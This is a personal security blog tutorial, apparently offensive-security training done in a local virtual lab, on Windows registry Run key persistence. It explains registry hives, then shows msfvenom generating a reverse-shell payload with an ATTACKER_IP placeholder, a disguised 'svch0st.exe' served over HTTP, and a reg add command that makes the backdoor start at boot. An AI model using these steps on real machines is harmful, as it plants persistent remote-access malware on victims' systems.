SecurityNguyen
Posts Tags About Categories
SecurityNguyen

Contents

Registry Run Key Persistence

Nguyen Nguyen included in Fundamentals
   458 words   3 minutes 

Note: If you need to zoom in, you can click on the image.

Warning
Everything shown here is carried out in a virtualized environment that is hosted on my local machine.

What is a registry?

Registry is a hierarchical database that contains information about the Windows System and application. Show in the picture below.


Components

Hives

You can think of hives as a way to categorizes information. There are 5 hives.

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

Contains information about the current log on user.

HKEY_LOCAL_MACHINE

Contains information about the computer system.

HKEY_USERS

HKEY_CURRRENT_CONFIG

What is a Run Key?

Run key is a registry that activate when a user log into the system. What we are going to do is create a key inside the Run key and point it to our backdoor/malware so that it activates every time a user log in.

The location of Run key is

Under HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce

Under HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

Hands on

The following tool I’m going to use is just Metasploit and msfvenom. I already created an malicious payload to infect the host. The malicious payload is called svch0st.exe. What I’m going to do is setup a HTTP web server to distribute the malicious payload to the victim machine.

Command
python3 -m http.server 9000


Next, we going to set up the listener and execute the malicious payload.


Here below, we can see that svch0st.exe (malicious payload) is running and we establish connection to the victim computer.


The next thing on the list is generating our backdoor using msfvenom. So, let open another shell.

To generate a payload, we're going to use the following command structure:

msfvenom -p payload LHOST=ATTACKER_IP LPORT=ATTACKER_PORT -f format > name.exe


Then, we're going to use meterpreter to upload the backdoor (evilLink.exe) to the victim machine. Don't forget to escape /.


Currently, we're inside svch0st.exe which is a 32-bit application. If we modify a registry of a 64-bit computer while we are in a 32-bit application, our changes will be added under:

HKEY_LOCAL_MACHINE\Software\Wow6432Node



The solution is to move to a 64-bit application and then modify the registry.




Now, we're going to open a command line inside the meterpreter using the command "shell" and add a value to the registry: (HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run). This registry will execute the backdoor whenever the system boot up or reboot.


Structure of the command:
Command
reg add RegistryPath /v programName /t ValueType /d PATH_TO_PAYLOAD /f
This command will point the system to automatically run the program at startup.

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v backdoor /t REG_SZ /d "C:\Windows\Temp\evilLink.exe" /f


Now that we added the value to the registry. Let's reboot the victim machine and see if our registry works.


While that is taking place, let's setup a listener on port 7777.

Boom, the victim machine automatically started the backdoor.

Updated on 2024-05-30
 Window Event LogBlue Team
Back | Home